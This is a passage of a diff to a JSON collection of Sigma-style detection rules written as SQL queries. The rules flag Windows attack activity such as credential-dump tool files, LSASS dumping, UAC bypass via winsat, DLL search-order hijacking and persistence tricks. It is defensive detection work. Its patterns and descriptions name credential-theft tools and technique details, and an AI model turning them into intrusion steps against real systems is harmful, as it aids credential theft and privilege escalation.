'%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" + "filename": "file_event_win_legitimate_app_dropping_exe.yml" }, { - "title": "Remote 
PowerShell Sessions Network Connections (WinRM)", - "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "title": "UAC Bypass Abusing Winsat Path Parsing - File", + "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", "status": "test", - "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of remote PowerShell execution" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" ], - "filename": "win_security_remote_powershell_session.yml" + "filename": "file_event_win_uac_bypass_winsat.yml" }, { - "title": "Pass the Hash Activity 2", - "id": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", - "status": "stable", - "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", - "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", + "title": "Cred Dump Tools Dropped Files", + "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", + "status": "test", + "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1550.002" + "attack.credential_access", + 
"attack.t1003.001", + "attack.t1003.002", + "attack.t1003.003", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Administrator activity" + "Legitimate Administrator using tool for password recovery" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4624' AND SubjectUserSid = 'S-1-0-0' AND LogonType = '3' AND LogonProcessName = 'NtLmSsp' AND KeyLength = '0') OR (EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo')) AND NOT (TargetUserName = 'ANONYMOUS LOGON'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\'))" ], - "filename": "win_security_pass_the_hash_2.yml" 
+ "filename": "file_event_win_cred_dump_tools_dropped_files.yml" }, { - "title": "Azure AD Health Service Agents Registry Keys Access", - "id": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", + "title": "Creation Exe for Service with Unquoted Path", + "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", "status": "test", - "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\ADHealthAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR 
ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\'" ], - "filename": "win_security_aadhealth_svc_agent_regkey_access.yml" + "filename": "file_event_win_creation_unquoted_service_path.yml" }, { - "title": "Access Token Abuse", - "id": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", + "title": "Suspicious Process Writes Ntds.dit", + "id": "11b1ed55-154d-4e82-8ad7-83739298f720", "status": "experimental", - "description": "This rule tries to detect token impersonation and theft. (Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", - "author": "Michaela Adams, Zach Mathis", + "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1134.001" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Anti-Virus" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'Advapi' AND AuthenticationPackageName = 'Negotiate' AND ImpersonationLevel LIKE '\\%\\%1833' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "win_security_access_token_abuse.yml" + "filename": 
"file_event_win_susp_ntds_dit.yml" }, { - "title": "Generic Password Dumper Activity on LSASS", - "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "title": "Suspicious Get-Variable.exe Creation", + "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", "status": "experimental", - "description": "Detects process handle on LSASS process with certain access mask", - "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "car.2019-04-004", - "attack.t1003.001" + "attack.persistence", + "attack.t1546", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT 
(((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList 
LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_lsass_dump_generic.yml" + "filename": "file_event_win_susp_get_variable.yml" }, { - "title": "Addition of Domain Trusts", - "id": "0255a820-e564-4e40-af2b-6ac61160335c", - "status": "stable", - "description": "Addition of domains is seldom and should be verified for legitimacy.", - "author": "Thomas Patzke", + "title": "Creation Of Non-Existent System DLL", + "id": "df6ecb8b-7822-4f4b-b412-08f524b4576c", + "status": "experimental", + "description": "Detects the creation of system dlls that are not present on the system. 
Usually to achieve dll hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems), fornotes", "tags": [ + "attack.defense_evasion", "attack.persistence", - "attack.t1098" + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate extension of domain structure" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4706')" + "SELECT * FROM logs WHERE (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') OR TargetFilename LIKE '%\\\\SprintCSP.dll' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_susp_add_domain_trust.yml" + "filename": "file_event_win_create_non_existent_dlls.yml" }, { - "title": "Credential Dumping Tools Service Execution - Security", - "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "DLL Search Order Hijackig Via Additional Space in Path", + "id": "b6f91281-20aa-446a-b986-38a92813a18f", + "status": "experimental", + "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", + "author": "frack113, Nasreddine 
Bencherchali", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_mal_creddumper.yml" + "filename": "file_event_win_dll_sideloading_space_path.yml" }, { - "title": "Tap Driver Installation - Security", - "id": "9c8afa4d-0022-48f0-9456-3712466f9701", - "status": "test", - "description": "Well-known TAP software installation. 
Possible preparation for data exfiltration using tunnelling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "title": "Potential Persistence Attempt Via ErrorHandler.Cmd", + "id": "15904280-565c-4b73-9303-3291f964e7f9", + "status": "experimental", + "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.persistence" ], "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%tap0901%' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\WINDOWS\\\\Setup\\\\Scripts\\\\ErrorHandler.cmd' ESCAPE '\\'" ], - "filename": "win_security_tap_driver_installation.yml" + "filename": "file_event_win_persistence_error_handler_cmd.yml" }, { - "title": "Win Susp Computer Name Containing Samtheadmin", - "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "title": "VsCode Powershell Profile Modification", + "id": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", "status": "experimental", - "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", - "author": "elhoim", + "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "cve.2021.42278", - "cve.2021.42287", "attack.persistence", "attack.privilege_escalation", - "attack.t1078" + "attack.t1546.013" ], "falsepositives": [ - 
"Unknown" + "Legitimate use of the profile by developers or administrators" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Microsoft.VSCode\\_profile.ps1' ESCAPE '\\'" ], - "filename": "win_security_susp_computer_name.yml" + "filename": "file_event_win_susp_vscode_powershell_profile.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", - "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "WMI Persistence - Script Event Consumer File Write", + "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "status": "test", + "description": "Detects file writes of WMI script event consumer", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR 
ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\'" ], - "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" + "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" }, { - "title": "Security Eventlog Cleared", - "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", - "status": "test", - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "title": "LSASS Process Dump Artefact In CrashDumps Folder", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", + "status": "experimental", + "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", + "author": "@pbssubhash", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Rare legitimate dump of the process by the operating system due to a crash of lsass" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "win_security_susp_eventlog_cleared.yml" + "filename": 
"file_event_win_lsass_shtinkering.yml" }, { - "title": "DiagTrackEoP Default Login Username", - "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "title": "CVE-2021-44077 POC Default Dropped File", + "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", "status": "experimental", - "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation" + "attack.execution", + "cve.2021.44077" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\'" ], - "filename": "win_security_diagtrack_eop_default_login_username.yml" + "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" }, { - "title": "RDP over Reverse SSH Tunnel WFP", - "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "title": "Suspicious Interactive PowerShell as SYSTEM", + "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", - "author": "Samir Bousseaden", - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1090.001", - "attack.t1090.002", - "attack.t1021.001", - "car.2013-07-002" - ], + "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Programs that connect locally to the RDP port" + "Administrative 
activity", + "PowerShell scripts running as SYSTEM user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\')" ], - "filename": "win_security_rdp_reverse_tunnel.yml" + "filename": "file_event_win_susp_system_interactive_powershell.yml" }, { - "title": "Processes Accessing the Microphone and Webcam", - "id": "8cd538a4-62d5-4e83-810b-12d41e428d6e", - "status": "test", - "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential Remote Credential Dumping Activity", + "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", + "status": "experimental", + "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", + "author": "SecurityAura", "tags": [ - "attack.collection", - "attack.t1123" + 